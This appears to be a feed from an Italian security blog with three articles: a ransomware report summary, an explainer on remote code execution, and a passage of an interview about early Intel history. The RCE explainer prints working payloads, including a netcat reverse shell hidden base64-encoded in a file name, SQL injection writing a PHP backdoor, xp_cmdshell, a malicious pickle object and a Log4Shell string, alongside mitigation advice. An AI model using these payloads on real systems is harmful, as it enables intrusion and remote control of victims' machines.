In Italia, il numero di attacchi ransomware è calato rispetto all’anno precedente, ma si registra una maggiore concentrazione su settori strategici come industria, retail e tecnologia. Il gruppo RansomHub emerge come il più attivo, seguito da 8Base e LockBit 3, mentre nuove cyber gang stanno guadagnando terreno. La sanità e le infrastrutture critiche restano a rischio, sottolineando l’urgenza di strategie di difesa più avanzate. Sebbene alcuni settori mostrino una leggera riduzione degli attacchi, il panorama delle minacce rimane dinamico e in continua evoluzione, rendendo necessarie azioni mirate per migliorare la resilienza delle organizzazioni italiane.

L’intelligenza artificiale sta giocando un ruolo sempre più rilevante sia nella difesa che negli attacchi informatici. I cybercriminali sfruttano l’AI per creare malware più sofisticati, automatizzare attacchi e rendere più efficaci le campagne di phishing. L’accessibilità di strumenti AI avanzati ha reso più semplice per le cyber gang sviluppare minacce sempre più difficili da rilevare, obbligando aziende e forze dell’ordine a potenziare le strategie di contrasto. Le operazioni di law enforcement hanno ottenuto successi significativi, con azioni coordinate come l’Operazione Cronos ed Endgame che hanno colpito duramente gruppi come LockBit, ma i criminali continuano ad adattarsi e a evolversi rapidamente.

Un elemento distintivo del report è l’analisi diretta dei Threat Actors, basata sulle interviste condotte dal team DarkLab con gruppi ransomware come Ransom Cortex, RADAR, DISPOSSESSOR, Quilin e Stormous. Queste conversazioni offrono uno spaccato unico sulle motivazioni, le strategie e le dinamiche interne delle cyber gang, contribuendo a una comprensione più approfondita delle minacce. La crescente specializzazione dei gruppi e l’intensificazione delle loro attività rendono essenziale un monitoraggio costante del dark web e delle nuove tattiche emergenti per anticipare le future evoluzioni del ransomware.

L'articolo DarkLab di RHC Pubblica Il Report DarkMirror 2024: L’osservatorio delle minacce Ransomware proviene da il blog della sicurezza informatica.

Tra tutte le vulnerabilità la più temuta per le vittime e la più ricercata per gli aggressori è la remote code execution, tristemente nota RCE. Questa vulnerabilità permette di eseguire dei comandi arbitrari sul sistema attaccato. Questi possono essere inviati tramite script: pensiamo ad una pagina php caricata in un server web, comandi shell di windows oppure addirittura istruzioni macchina se parliamo di buffer overflow.

Questa tipologia di vulnerabilità permette di ottenere velocemente il controllo della vittima e questo attacco viene eseguito in remoto senza accesso fisico. Queste vulnerabilità sono sfruttate per vario genere, dall’accesso abusivo dei sistemi, installazione di software non autorizzato.

Ma non finisce qui: alcune caratteristiche ne amplificano l’effetto per esempio quando questa vulnerabilità è “non autenticata” (si parla quindi di unauthenticated RCE) oppure si ottengono fin da subito permessi elevati (come “system” su sistemi Windows o “root” su quelli Linux). Vulnerabilità del genere possono raggiungere tranquillamente score CVSS dai 9.8 ai 10.

Quale impatto può avere una vulnerabilità RCE?

Qui alcuni esempi di cosa può comportare questa vulnerabilità:

Penetrazione: gli aggressori possono accedere alla rete o al sistema.

• Privilege Escalation: dopo aver ottenuto l’accesso tramite un RCE, l’aggressore potrebbe provare ad aumentare i suoi privilegi sul sistema per aumentare il suo impatto e ottenere più accesso.
• Movimento laterale: gli aggressori potrebbero usare le vulnerabilità RCE per muoversi lateralmente, compromettendo sistemi aggiuntivi ed espandendo il loro controllo e accesso attraverso la rete. Ciò può portare a una violazione più estesa e a danni maggiori.
• Esfiltrazione: gli aggressori possono intercettare informazioni sensibili, accedervi ed esfiltrare. Ciò avviene tramite vari mezzi, tra cui malware che ruba i dati e software di scraping della memoria che cerca le credenziali.
• DOS e DDOS: i sistemi possono essere bloccati tramite attacchi RCE che esauriscono le risorse di rete o delle applicazioni, negando così agli utenti legittimi il servizio dell’applicazione.
• Ransomware: attraverso queste vulnerabilità RCE gli aggressori impediscono alle vittime di accedere ai sistemi e ai dati in cambio di denaro/riscatto.
• Backdoor, botnet e persistenza: l’attaccante che ha compromesso la macchina tramite un RCE può creare una backdoor per connettersi nuovamente alla macchina senza dover sfruttare nuovamente la vulnerabilità. Questo è noto come persistenza. Questo può essere utile, ad esempio, per incorporare la macchina compromessa in una botnet.
• Danni alla reputazione: un attacco RCE riuscito può danneggiare la reputazione di un’organizzazione, portando alla perdita di fiducia e sicurezza da parte dei clienti. Ciò può avere effetti a lungo termine sulle relazioni commerciali e sulla posizione di mercato.
• Interruzione operativa: le vulnerabilità RCE possono interrompere le normali operazioni aziendali causando interruzioni di sistema, corruzione dei dati e interruzioni del servizio.

Questa interruzione può influire sulla produttività, sul servizio clienti e sulla continuità aziendale complessiva.

Alcune distinzioni ed esempi

Un esempio è una vulnerabilità incontrata alcuni anni fa. Correva Marzo dell’anno 2021 e una mattina iniziava con un devastante attacco, all’inizio sconosciuto, che colpiva i sistemi di posta Exchange tramite uno zero day che sarà poi chiamato Proxy Logon (CVE-2021-26855 + CVE-2021-27065).

gli aggressori tentavano di caricare del codice attivo per poter compromettere i server di posta, per fortuna quasi tutti rilevati dagli EDR installati. Questa tipologia di attacco è appunto una esempio di remote code execution ed è stata classificata con 9.8 cvss v3.Per maggiori info: proxylogon.com/

La maggior parte di RCE sono concatenate ad altre vulnerabilità oppure sfruttate per altre debolezze inserite nel codice o nelle configurazioni, vediamone alcune con qualche semplice esempio:

Buffer Overflow

Nella sicurezza dello sviluppo dei software, un buffer overflow è un’anomalia in cui un programma, durante la scrittura di dati troppo grandi ricevuti in input in un buffer va a scrivere nelle aree di memoria adiacente.

Così il programma in seguito si troverà ad accedere a dei puntatori di memoria non validi perché sovrascritti. Non avendo più un riferimento valido alla successiva area di memoria che contiene la prossima istruzione da eseguire, va in crash oppure esegue un accesso non autorizzato a un’altra area di memoria.

Un attaccante, individuando e manipolando le aree che porterebbero al comportamento spiegato prima, può modificare il flow di esecuzione attraverso un input costruito appositamente, costringendo il programma ad eseguire del codice arbitrario iniettato dall’attaccante.

Prediamo ad esempio la CVE-2017-14980 che riguarda Sync Breeze Enterprise 10.0.28, un software che permette la sincronizzazione tra file. Questo software dispone di un interfaccia web protetta da login.

Si era scoperto che passando nella chiamata di login un username molto lungo, il software generava un buffer overflow.

Quindi come detto prima, generando un payload apposito passato nel input username nella richiesta di login si poteva sfruttare questo buffer overflow per eseguire del codice remoto.

Ne avevamo già parlato qui con anche un esempio pratico dal team di Hackerhood

Mancanza di validazione dell’input

Quando i dati trasmessi dal client al server non vengono sufficientemente puliti da caratteri che potrebbero modificare il comportamento dell’applicazione arrivando all’esecuzione di codice arbitrario.

Ipotizziamo questo frammento di codice dove il sistema carica un file in google drive tramite file caricato dall’utente.

exec("python pydrive.py " . $path . addslashes(trim($fileName));

In questo caso la procedura comporrà un comando python e in seguito lo avvierà in una shell del sistema. Quello che potremmo fare è sfruttare il nome del file per poter accordare un comando. Sono presenti dei controlli ma questi potrebbero mitigare un sql injection, ma non sono sufficienti per mitigare questo tipo di attacco RCE e quindi è possibile accordare un secondo comando.

Il comando potrebbe essere “rm tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc 10.11.0.4 1234 >/tmp/f“, non potrà essere usato per rinominare un file prima di caricarlo in quanto alcuni caratteri speciali lo impediscono (anche se in realtà potremmo modificare la chiamata REST abbiamo tentato un’altra strada).

Niente paura, per chi conosce la bash sa che è possibile eseguire un comando encodato in base64: utilizzando il carattere $() la shell eseguirà l’interno del contenuto ancor prima di eseguire il comando python, quindi carichiamo un file con nome:

$(cm0gdG1wL2Y7bWtmaWZvIC90bXAvZjtjYXQgL3RtcC9mfC9iaW4vc2ggLWkgMj4mMSB8IG5jIDEwLjExLjAuNCAxMjM0ID4vdG1wL2Y= | base64 -d | bash);

L’applicazione si troverà a eseguire dalla bash di linux questo comando ed ad avviare una reverse shell.

python pydrive.py /test/$(cm0gdG1wL2Y7bWtmaWZvIC90bXAvZjtjYXQgL3RtcC9mfC9iaW4vc2ggLWkgMj4mMSB8IG5jIDEwLjExLjAuNCAxMjM0ID4vdG1wL2Y= | base64 -d | bash);

Il principale problema è che non sono stati filtrati i caratteri che in questo caso potrebbero interagire con i comandi che verranno eseguiti nella shell.

File Uploads

Un caso classico di RCE è quello legato al caricamento di file arbitrari non correttamente filtrati contenente codice attivo. Quando le funzionalità di caricamento file non sono implementate e testate correttamente, possono lasciare aperta la strada al caricamento di file dannosi per ottenere RCE.

In questo scenario un’ipotetica applicazione web PHP offre all’utente una funzionalità per caricare immagini e farle vedere in una galleria dopo averle caricate. Queste immagini sono archiviate in una cartella “/img/” in uno spazio pubblico del server web. I file non vengono verificati o rinominati. Per cui potremmo caricare un file contenente il seguente codice “” con l’estensione .php, come ad esempio exploit.php.

A questo punto una volta caricato il messaggio, ispezioniamo il DOM e dovremmo trovare l’immagine caricata, o quella che doveva essere.

Richiamando questo percorso, con molta probabilità eseguiremo il codice contenuto nel file. In questo caso non sono stati controllati né il contenuto né l’estensione del file caricato. se possibile evitare che il file sia accessibile pubblicamente. a questo punto non ci resta che richiamare url individuato: example.local/img/exploit.php?…

Injection

Queste vulnerabilità derivano da una sanificazione inadeguata degli input Se un aggressore fornisse input dannosi appositamente creati, alcuni di questi possono essere interpretati come comandi eseguibili, consentendo all’aggressore di eseguire il proprio codice. Di questa categoria fanno parte SQLi (sql injection) e SSTI (server side template injection)

SQL INJECTION

Una SQL Injection (o SQLi) è una vulnerabilità di sicurezza informatica che consente a un attaccante di interferire con le query SQL che un’applicazione invia a un database. In sostanza, l’attaccante “inietta” codice SQL dannoso all’interno di input dell’utente (come campi di testo in un modulo web) per manipolare la query originale e ottenere risultati non desiderati.

Per esempio in Mysql se il grant FILE è abilitato nei permessi dell’utente che sta eseguendo le query, è possibile arrivare ad eseguire del codice remoto.

Ipotizziamo in questo pezzo di codice che gestisce la richiesta a db di un pagina prima di eseguirla:

$sql = 'SELECT * FROM user WHERE username = "' + $username '"'

L’applicazione si aspetterebbe un username per verificare se sia esistente o no, come ad esempio “mario”. Se invece di mario, passiamo questo frammenti di codice SQL:

1" union all select 1, 2, "" into OUTFILE "c:/xampp/htdocs/backdoor.php" #

Verrà aggiunto alla QUERY originale di prima creando una nuova che il motore database eseguirà.

SELECT * FROM user WHERE username = "1" union all select 1, 2, "" into OUTFILE "c:/xampp/htdocs/backdoor.php" #

Il processo è estremamente semplificato ma in questo modo avremmo indotto la query sql a scrivere del contenuto in un percorso arbitrario.

example.local/backdoor.php?cmd…

Se fossimo invece in ambito Microsoft sql server potremmo addirittura inviare dei comandi shell al motore database pronti da essere eseguiti aggiungendo questi comandi alla query originale:

EXEC sp_configure 'Show Advanced Options', 1; reconfigure; sp_configure; EXEC sp_configure 'xp_cmdshell', 1; reconfigure; xp_cmdshell "whoami";

La vittima eseguirà whoami nella sua console. Uno dei motivi è il concatenamento di codice sql e variabili senza alcun genere di controllo oltre a permettere comandi che potrebbero essere disattivati come FILE.

In alcune condizioni, l’utilizzo di utenti database con privilegi elevati (come root o sa), possono amplificare la potenza dell’attacco e permettono per esempio l’esecuzione di comandi come xp_cmdshell in mssql.

SERVER-SIDE TEMPLATE INJECTION TO RCE

Proprio come con SQL injection, quando l’input utente non filtrato viene passato ad un motore di creazione di template e questo viene concatenato nei template anziché essere trasmesso come dato, può generarsi una condizione di esecuzione di codice remoto. Vediamo un esempio applicato a una vecchia versione di Twig (1.9.0)

I template statici che forniscono semplicemente dei placeholder in cui viene reindirizzato il contenuto dinamico, non sono generalmente vulnerabili all’iniezione di template lato server come nell’esempio qui sotto:

$output = $twig->render("Dear {first_name},", array("first_name" => $user.first_name) );

Ma se invece l’input dell’utente viene concatenato nel template prima del rendering come in questo esempio:

$output = $twig->render("Dear " . $_GET['name']);

Questa volta gli utenti possono personalizzare parti del codice prima che venga inviato al rendering.

Quindi piuttosto che passare un valore statico, come ad esempio “mario”, passiamo invece {{payload}} come parametro GET, potendo così eseguire del codice arbitrario:

example.com/?name={{_self.env.…

In questo caso accedendo all’environment di Twig e usando la registerUndefinedFilterCallbackfunzione, è possibile registrare un alias per la funzione exec. Chiamando poi getFilter con il comando desiderato ls [call_user_func(‘exec’,’id’);].

A questo punto vedremo output del comando.

Unsafe Deserialization

Questo metodo facilita la trasmissione dei dati impacchettandoli in una singola stringa di bit, che il sistema ricevente può decodificare.

Se la struttura dei dati serializzati non è ben definita, un aggressore potrebbe creare un input che verrebbe interpretato erroneamente durante l’unpacking.

Questa interpretazione errata potrebbe portare all’esecuzione di codice remoto, a seconda di come i dati vengono elaborati e archiviati.

Il codice seguente è un semplice esempio di utilizzo di cPickle per generare un auth_token, che è un oggetto utente serializzato, per poi salvarlo in un cookie.

import cPickle
from base64 import b64encode, b64decode

class User:
def __init__(self):
self.username = "anonymous"
self.password = "anonymous"
self.rank = "guest"

h = User()
auth_token = b64encode(cPickle.dumps(h))
cookie = {'auth_token': auth_token}

pickle.dumps() in Python è una funzione che serve a serializzare un oggetto in un flusso di byte. Output ottenuto può essere poi utilizzato per esempio nei cookie per gestire processi di autenticazione.

A ogni richiesta poi la vittima eseguirà la deserializzazione poi per ricostruire l’oggetto.

token = cPickle.loads(b64decode(new_token))

La vulnerabilità si verifica quando l’aggressore riesce a manipolare questo flusso di dati, modificando in questo caso l’oggetto serializzato presente nel cookie, per esempio, del browser.

Per cui creando un nuovo oggetto serializzato ad-hoc, possiamo eseguire del codice remoto nella vittima una volta che viene de-serializzato per leggere il contenuto.

import cPickle, os

from base64 import b64encode, b64decode

class Evil(object):
def __reduce__(self):
return (os.system,("whoami",))

e = Evil()
evil_token = b64encode(cPickle.dumps(e))

Quando l’oggetto viene deserializzato sul server, il metodo __reduce__ verrà invocato ed eseguirà il comando remoto “whoami”.

RCE VIA RACE CONDITION

Una Race Condition si verifica quando il risultato finale dipende dall’ordine preciso in cui questi processi/thread eseguono le loro operazioni. In altre parole, il risultato diventa imprevedibile e può variare a seconda di quale processo “vince la gara” nell’accedere per primo alla risorsa.

Prendiamo ad esempio la CVE-2021-24377, il sistema prevede il caricamento di un file zip, in seguito lo scompattamento di tutti i file in una directory nota per poi infine rimuovere i file appena estratti.

La condizione di RACE CONDITION si verificherà se subito dopo il caricamento di questo file tenteremo più volte di chiamare il link pubblico a un file contenuto nel momento che il sistema inizierà a scompattare lo zip prima che la procedura finisca la scompattazione e quindi la rimozione dei file scompattati.

Se l’archivio includesse un file con contenuto attivo PHP (backdoor.php) potremmo quindi richiamare questo trasformando l’attacco da una race condition a una RCE.

LFI/RFI to RCE

LFI permette di caricare del contenuto locale dove è presente del codice attivo che l’applicazione eseguirà. Il primo obiettivo è quello di riuscire a caricare questo contenuto. In questo esempio abbiamo un server web apache con le configurazione di default, dove le varie pagine sono chiamate includendo il file nel url.

example.local?page=index.php

a questo punto ipotizzando che i log di apache siano nel percorso /var/logs/httpd/access.log potremmo iniettare del codice php tramite netcat.

nc ip port

una volta aperta la connessione scriveremo:

a questo punto non faremmo altro nel raggiungere il sito ed eseguire dei comandi tramite il link:

example.local?page=/var/logs/h…

Per quanto riguarda il remote inclusion è ancora più semplice. Consiste nel caricare del contenuto remoto solitamente tramite un url. Se il server web è abilitato per includere risorse remote (allow_url_include=on), potremmo includere il codice mostrato prima per esempio su pastbin.

Quindi richiamarlo

example.local?page=https://pas…

DDL INJECTION

DLL injection è una tecnica che permette di eseguire codice arbitrario all’interno dello spazio di indirizzamento di un processo in esecuzione. Questo viene fatto caricando una DLL (Dynamic Link Library) nel processo target.

I principali passaggi sono:

Allocazione di memoria: Il processo iniettore alloca memoria nel processo target.
Scrittura del percorso della DLL: Il percorso della DLL da iniettare viene scritto nella memoria allocata.
Caricamento della DLL: Viene chiamata la funzione LoadLibrary per caricare la DLL nel processo target.

Un esempio reale è la CVE-2020-7315. La vulnerabilità affligge McAfee Agent (MA) per Windows precedente alla versione 5.6.6 e consente agli utenti locali di eseguire codice arbitrario tramite l’utilizzo di una DLL dannosa.

La causa è una DDL mancante nel percorso C:\Windows\System32\ che il processo di McAfee macompatsvc.exe tenta di caricare all’avvio.

Quindi un attaccante posizionando in quel percorso una nuova DLL malevola, può eseguire da parte del eseguibile del codice malevolo al riavvio del processo.

Un altro attacco più sofisticato è quello di utilizzare degli injector che attraverso le API VirtualAllocEx, WriteProcessMemory, e CreateRemoteThread caricando dinamicamente una DLL in un processo già attivo.

In un sistema vulnerabile dopo averlo compromesso, basterebbe identificare un PID di un processo target. Quindi è necessario forgiare una DLL malevola e iniettarla con un injector.

A grandi linee il processo è questo:

• Con tasklist identificare il PID target (es 3456)
• Compilare injector e la DLL
• Eseguire dllinj.exe 3456
• A questo punto la DLL è stata caricata ed eseguita

Qui degli esempi di DLL Injector e payload:

DLL Injector

github.com/PacktPublishing/Mal…

DDL Payload

github.com/PacktPublishing/Mal…

Questa tecnica può rappresentare una minacce significativa, specialmente per i sistemi mal configurati e legacy. Questi sistemi spesso mancano delle patch di sicurezza e delle configurazioni necessarie per difendersi da attacchi così sofisticati, oppure degli EDR che rilevino abuso di queste API da parte dei processi.

L’utilizzo di queste api come VirtualAlloc lo avevamo visto nell’analisi del infostealer Tesla Agent.

redhotcyber.com/post/rhc-da-vi…

Common Vulnerabilities and Exposures (CVEs)

Sfruttare determinati CVE è un altro metodo per ottenere l’esecuzione di codice remoto. Le aziende dietro i programmi bug bounty integrano servizi e pacchetti di terze parti (come librerie e framework) tutto il tempo, poiché possono accelerare lo sviluppo e ridurre i costi di tecnologia generali ad esso associati.

Ma questo ha un altro costo: questi servizi integrati possono spesso contenere codice non sicuro che possono portare a RCE. Prendiamo ad esempio Log4J (CVE-2021-44228), un semplice payload come quello qui sotto avrebbe potuto avere un impatto su qualsiasi server che utilizza Apache Log4J, come ad esempio i sistemi di virtualizzazione Vmware.

${jndi:ldap://url.com/exploit}

Come mitigare gli attacchi RCE?

Esistono differenti metodi per mitigare gli impatti di una Remote Code Execution, di seguito ne analizzeremo alcuni.

Validazione e sanificazione degli input

• Validare gli input: Applicare controlli rigorosi su tutti i dati forniti dagli utenti, verificando che rispettino il formato, la lunghezza e il tipo di dato atteso. Non fidarsi mai della validazione lato client e validare sempre sul server.Don’t trust, verify.
• Sanificare gli input: Oltre alla validazione, è necessario ripulire o codificare i dati in input per neutralizzare eventuali caratteri o sequenze dannose.

Pratiche di codifica sicura

• Query parametrizzate (Prepared Statement): Fondamentale per prevenire SQL Injection. Non concatenare mai input dell’utente direttamente nelle query SQL.
• Evitare eval() (e funzioni simili): Queste funzioni eseguono codice arbitrario e sono estremamente pericolose se coinvolgono input dell’utente. Quasi sempre esistono alternative più sicure.
• Principio del minimo privilegio: Concedere solo i permessi necessari a utenti e processi. Limitare inoltre l’accesso a risorse e funzionalità sensibili.
• Gestione sicura delle sessioni: Utilizzare ID di sessione robusti, implementare timeout di sessione adeguati e rigenerare l’ID di sessione dopo il login.
• Gestione degli errori: evitare di rivelare informazioni sensibili nei messaggi di errore. Registrare gli errori per il debug, ma presentare messaggi di errore generici agli utenti.

Gestione delle dipendenze e patch

Mantenere il software aggiornato: Aggiornare regolarmente software, librerie, framework e sistemi operativi con le patch di sicurezza più recenti, incluse le dipendenze di terze parti. Scansione delle vulnerabilità: Utilizzare strumenti per identificare vulnerabilità note nelle dipendenze.

Processo di gestione delle patch: Implementare un processo formale per tracciare, testare e applicare le patch di sicurezza.

Deserializzazione sicura

Evitare la deserializzazione di dati non attendibili: Se possibile, evitare di deserializzare dati provenienti da fonti non attendibili. Validare i dati deserializzati: Se la deserializzazione è necessaria, convalidare la struttura e il contenuto degli oggetti deserializzati prima di utilizzarli.

Utilizzare librerie di deserializzazione sicure: Utilizzare librerie progettate per prevenire vulnerabilità di deserializzazione.

Sicurezza della memoria

• Protezione da Buffer Overflow: Utilizzare tecniche appropriate per prevenire buffer overflow, come il controllo dei limiti e funzioni di gestione delle stringhe sicure.
• Linguaggi memory-safe: Considerare l’utilizzo di linguaggi di programmazione memory-safe (ad esempio, Rust, Go) quando possibile, poiché offrono protezione integrata contro molte vulnerabilità legate alla memoria.

Web Application Firewall (WAF)

Implementare un WAF: Un WAF può aiutare a rilevare e bloccare traffico dannoso, inclusi tentativi di sfruttare vulnerabilità RCE e addirittura 0day.

È un importante livello di difesa e prevenzione, ma non sostituisce le pratiche di codifica sicura e tutte quelle citate precedentemente!

Gestione sicura dei file

• Validare gli upload di file: Convalidare rigorosamente tipi di file, dimensioni e contenuto. Non fidarsi solo dell’estensione del file
• Archiviare i file caricati in modo sicuro: Archiviare i file caricati al di fuori della root web e utilizzare permessi di file appropriati per impedirne l’esecuzione.
• Disabilitare la navigazione delle directory: Impedire agli utenti di navigare nelle directory contenenti i file caricati.

Esecuzione di Test di sicurezza

• Analisi statica: Utilizzare strumenti di analisi statica del codice per identificare potenziali vulnerabilità nel codice sorgente prima che venga distribuito.
• Analisi dinamica (DAST): testare l’applicazione in esecuzione per identificare vulnerabilità.
• Penetration testing: Simulare attacchi reali per scoprire debolezze di sicurezza.
• Revisioni del codice: Condurre revisioni del codice regolari per identificare e risolvere problemi di sicurezza.
• Analisi della composizione del software (SCA): Analizzare le dipendenze dell’applicazione per identificare vulnerabilità note.

Rafforzare le protezioni della memoria dei processo:

• Control Flow Guard: Utilizzare il Control Flow Guard (CFG) per prevenire il dirottamento.
• DEP e ASR: Abilitare la prevenzione dell’esecuzione dei dati (DEP) e la randomizzazione del layout dello spazio degli indirizzi (ASLR) per randomizzare gli indirizzi di memoria e impedire l’iniezione.

Utilizzare EDR efficaci

• Monitor API: utilizzare degli EDR che monitorano chiamate alle API VirtualAllocEx, WriteProcessMemory, CreateRemoteThreadsospette dai processi.

Altre considerazioni

• Intestazioni di sicurezza: Utilizzare intestazioni di sicurezza (ad esempio, Content Security Policy (CSP), HTTP Strict Transport Security (HSTS)) per mitigare vari tipi di attacchi lato browser.
• Limitazione frequenza dei login: Limitare la frequenza con cui un attaccante possa eseguire continui tentativi di login per prevenire attacchi brute-force.
• Logging e monitoraggio: Registrare eventi relativi alla sicurezza e monitorare i sistemi per attività sospette. Impostare avvisi per potenziali attacchi.
• Piano di risposta agli incidenti: Avere un piano in atto su come rispondere agli incidenti di sicurezza.

Conclusione

Le vulnerabilità che portano ad una RCE sono questioni veramente serie e sono più diffuse di quanto si vorrebbe. Quando si realizza una applicazione o dei sistemi client-server, bisognerebbe sempre seguire le buone pratiche sia in fase di progettazione che di realizzazione ma anche prima di metterla in produzione e durante il mantenimento nel tempo.

Una raccomandazione è quella di monitorare costantemente le vulnerabilità attraverso anche community come RedHotCyber e tramite i comunicati dei produttori dei software (in cui molte volte è possibile iscriversi per ricevere i loro comunicati). Anche Agenzia per la cybersicurezza nazionale, come possiamo leggere dalle FAQ, monitora e invia preventivamente informazioni sulle minacce emergenti e relative attività di mitigazione attraverso i suoi canali pubblici.

Possiamo quindi seguire il loro canale Telegram al link https://t.me/s/CSIRT_Italia
Un altro canale interessante è quello del cert agid al link t.me/certagid

L'articolo Alla scoperta della Remote Code Execution (RCE). Il bug di sicurezza più temuto! proviene da il blog della sicurezza informatica.

Un’intervista esclusiva a Ettore Accenti. Pioniere dei pionieri della rivoluzione tecnologica in Italia. Ingegnere e imprenditore, ha segnato la storia dell’informatica italiana. Fondatore di Eledra 3S negli anni ’60, ha portato i microprocessori Intel in Italia negli anni ’70 e reso accessibili i computer Amstrad negli anni ’80, collaborando con aziende leader del settore.

Ho incontrato Ettore Accenti, ingegnere e fondatore di Amstrad Italia, in un grigio pomeriggio di febbraio. La nostra chiacchierata si è subito trasformata in un viaggio storico: un racconto che inizia a Milano, alla fine degli anni Sessanta, attraversa gli Ottanta e arriva ai giorni nostri, testimoniando in prima persona gli eventi che hanno forgiato la Silicon Valley.

La nascita dell’industria elettronica, lo sviluppo tecnologico e le storie di visionari che trasformarono la Valle di Santa Clara nel Sancta Sanctorum della tecnologia. Decisioni rivoluzionarie – come quella di Intel di abbandonare le memorie per concentrarsi sui microprocessori – vennero prese nelle stanze “segrete” dei colossi del settore, plasmando il futuro digitale. Scienziati, inventori e trilioni di dollari hanno catapultato il mondo nella rivoluzione informatica, partendo da una terra un tempo dominata da frutteti. In sole due ore di intervista, Accenti mi ha trasportato, con il pathos del suo racconto, in quegli ambienti, facendomi scoprire storie e persone che altrimenti sarebbero rimaste nell’ombra.

L’ingegnere Accenti incarna le qualità esemplari degli italiani: l’intraprendenza milanese, l’anarchia creativa napoletana, la tenacia dei meridionali e l’ingegno di una consorte siciliana. Questo mix spiega i suoi successi, nonostante un contesto spesso poco favorevole. Ma come ebbe inizio questa avventura? Scopriamolo insieme.

Nato a Milano in una famiglia di ingegneri, coltivò fin da piccolo una passione viscerale per la tecnologia, accompagnata dall’amore per la fotografia. Dopo il liceo, all’Istituto Zaccaria, si iscrisse al Politecnico di Milano. La scintilla definitiva si accese durante le scuole medie, quando, leggendo un libricino divulgativo, scoprì le onde hertziane e realizzò il suo primo ricevitore radio.

Negli anni in cui, all’Università di Berkeley, prendeva forma il movimento del Sessantotto – che in Italia culminò con l’autunno caldo – Accenti, a Milano, saldava transistor, replicando in piccolo la rivoluzione tecnologica d’oltreoceano. Collaborando con una rivista di elettronica, si immerse nello studio dei semiconduttori, i materiali alla base dei transistor che di lì a poco avrebbero sostituito le ingombranti valvole termoioniche. Fu così che ebbe inizio la sua missione: trasformare l’Italia da spettatrice a protagonista dell’era dei microchip.

Per colmare le lacune dell’editoria hobbistica, utilizzò le “replay card” – cartoline prestampate per richiedere dati tecnici alle aziende -. Grazie a questo sistema, ottenne manuali e componenti da aziende come Philips e SGS, realizzando progetti pionieristici. Ma il salto definitivo arrivò con Intel.
Ing. Ettore Accenti
Carlo: Ingegnere, come iniziò la collaborazione con Intel?

Accenti: Nell’agosto del 1969, leggendo la rivista Electronics, scoprii la neonata Intel, fondata da Robert Noyce e Gordon Moore a Mountain View. Da amministratore di Eledra 3S, inviai una lettera – scritta dalla mia segretaria, futura moglie e studentessa alla Bocconi – per propormi come loro rappresentante in Italia.

Carlo: Parliamo di Robert Noyce, co-inventore del circuito integrato, e di Gordon Moore, padre dell’omonima legge?

Accenti: Esatto. Dopo mesi di silenzio, mi chiamò Jean Paulsen di Intel Europa. Organizzammo un incontro a Milano e, nonostante le titubanze iniziali, ottenni un periodo di prova di tre mesi e la documentazione per due prodotti: la memoria i3101 e la Silicon-MOS da 256 bit.

Legge di Moore, Steve Jurvetson

Carlo: Ha conosciuto i giganti dell’informatica?

Accenti: Certo. Oltre agli affari, volevo scoprire le persone dietro i nomi, le cui storie sono leggendarie. Conosci la vicenda di Noyce e Moore?

Carlo: Racconti Ingegnere.

Accenti: William Shockley, premio Nobel per la Fisica nel 1956, lasciò i Bell Labs nel 1955 per fondare a Mountain View la Shockley Semiconductor. Tra i primi assunti vi furono Gordon Moore (chimico) e Robert Noyce (fisico), che nel 1957 abbandonarono l’azienda insieme ad altri sei colleghi, gruppo noto come gli “8 traditori”, per fondare la Fairchild Semiconductor. Nel 1968, Noyce e Moore lasciarono anche Fairchild per creare Intel. Altri ex Fairchild, come Jerry Sanders, fondarono AMD nel 1969, mentre National Semiconductor, esistente dal 1959, reclutò talenti proprio da Fairchild.
Per gentile concessione dell’Ing. Ettore Accenti
Carlo: Avviata la collaborazione, è mai volato in America, alla sede di Intel?

Accenti: Sì, già nel primo anno andai in California per incontrare i fondatori di Intel. Partecipai anche a incontri in Italia con dirigenti della stessa azienda, ma l’esperienza più significativa fu quella a Mountain View.

Carlo: Chi incontrò alla Intel?

Accenti: Oltre a Noyce e Moore, incontrai Bob Graham, il marketing manager. In Italia, negli uffici della mia azienda, ricevetti visite da Mike Markkula, Ted Hoff e Stan Mazor.

Carlo: Markkula è una figura chiave. Quale ruolo ricopriva?

Accenti: Markkula era sales manager di Intel, ma la svolta arrivò nel 1976, quando investì 250.000 dollari in Apple, salvando Jobs e Wozniak dal fallimento. Senza di lui, Apple come la conosciamo oggi forse non esisterebbe.

Carlo: All’inizio Intel produceva memorie, non processori. Si imbatté in problemi tecnici?

Accenti: Esatto. All’epoca il Dr. Faggin non era ancora arrivato in Intel. Come per ogni innovazione, non mancarono intoppi. Hai mai sentito parlare del “Soft Error”? Alcune aziende, come Honeywell, sostituivano le vecchie memorie magnetiche con i nostri chip, più compatti ed efficienti. Seguivo personalmente i test fino alla consegna al cliente, ma Honeywell iniziò a restituire le i1103, giudicate difettose. Sostituivo i chip e li inviavo per analisi, mentre Intel li dichiarava funzionanti. Dopo sei mesi, scoprimmo che il problema era causato dai raggi cosmici, particelle che, attraversando l’atmosfera, alteravano la carica elettrostatica dei chip, trasformando un bit da 1 a 0. La soluzione fu schermare i chip dalle radiazioni.

Carlo: Raggi cosmici? Incredibile. E in Italia, come reagì il mercato?

Accenti: Distribuivo memorie Intel a clienti come Olivetti, Siemens e Selenia. Il mercato italiano era strategico per loro: i dirigenti Intel venivano spesso qui. Ricordo un episodio esilarante.

Carlo: Lo Racconti!

Accenti: Nel 1970, accompagnai Gordon Moore, Ed Gelbach e Tom Lawrence alla Olivetti di Ivrea. Ero alla guida della mia Alfa Giulietta a 160 km/h sull’autostrada Milano-Torino, quando udii dal sedile posteriore gridare: “Ettore!!! Se non rallenti ti togliamo la rappresentanza! In questa auto stai trasportando metà del quartier generale Intel!”
Per gentile concessione dell’Ing. Ettore Accenti
Carlo: Intel, da pioniera, ha sempre avuto successo?

Accenti: Negli anni ’70, con il mercato delle memorie saturo e la concorrenza in crescita, Intel cercò nuovi sbocchi puntando sul settore degli orologi al quarzo. Acquistò la “Microma”, un’azienda specializzata in orologi elettronici a cristalli liquidi. Robert Noyce mi mostrò il suo primo orologio al quarzo, con una precisione di pochi secondi all’anno e un design futuristico, ma a 200 dollari si rivelò un cattivo affare. Io, con Eledra 3S, ne acquistai un lotto ma il progetto fallì.

Carlo: E con Apple? Collaborò con Steve Jobs?

